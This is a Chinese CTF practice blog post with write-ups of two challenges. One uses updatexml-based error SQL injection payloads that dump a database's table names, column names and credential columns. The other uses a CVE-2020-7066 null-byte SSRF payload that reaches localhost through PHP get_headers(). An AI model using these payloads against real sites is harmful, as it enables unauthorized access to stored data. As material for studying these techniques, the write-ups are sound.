今天在ctftime上找了比赛,但是吧,不太行,只能等着明天结束后的wp了。。。
回归刷题日常
题目一:
[极客大挑战 2019]HardSQL(说真的,真的不喜欢SQL注入的题。。。)
打开题目后又是熟悉的界面。。。
看了wp说是报错注入,
学习一下两个函数
- updatexml():更新xml文档
语法updatexml(目标xml文档,xml路径,更新的内容) - extractvalue() :对XML文档进行查询的函数
语法:extractvalue(目标xml文档,xml路径)
两个函数的第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,即使没有所查询的内容也不会报错,但如果写入其他格式,就会报错,并且会返回写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
先是测验了一下,过滤了 union,or,and等等等
构造报错注入的payload:
check.php?username=1%27or(updatexml(1,concat('~',database(),'~'),1))%23&password=123
concat():
连接字符串,这里将’/‘换成了’~’(或者0x7e),否则只是找不到/database()的路径,并不会报错。
爆出数据库
payload:
check.php?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))%23&password=123
爆出表名
payload:
check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(%27H4rDsq1%27)),0x7e),1))%23&password=123
爆列名
payload:
check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))%23&password=123
只出了一半的flag,(extractvalue和updatexml函数都只能一次最多显示32位)
接着要用到right():从字符串右端取指定个数字符
payload:
check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1)),0x7e),1))%23&password=123
去掉重复的部分连起来就是flag
题目二:
[GKCTF2020]cve版签到
说是主要考察的是cve-2020-7066,ssrf 漏洞:
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符(题目中用的%00),则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。
get_headers():PHP系统级函数,返回一个包含有服务器响应一个 HTTP 请求所发送的标头的数组。如果失败则返回 FALSE 并发出一条 E_WARNING 级别的错误信息(可用来判断远程文件是否存在)。
payload:
?url=http://127.0.0.1%00www.ctfhub.com
payload:
?url=http://127.0.0.123%00www.ctfhub.com
991
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
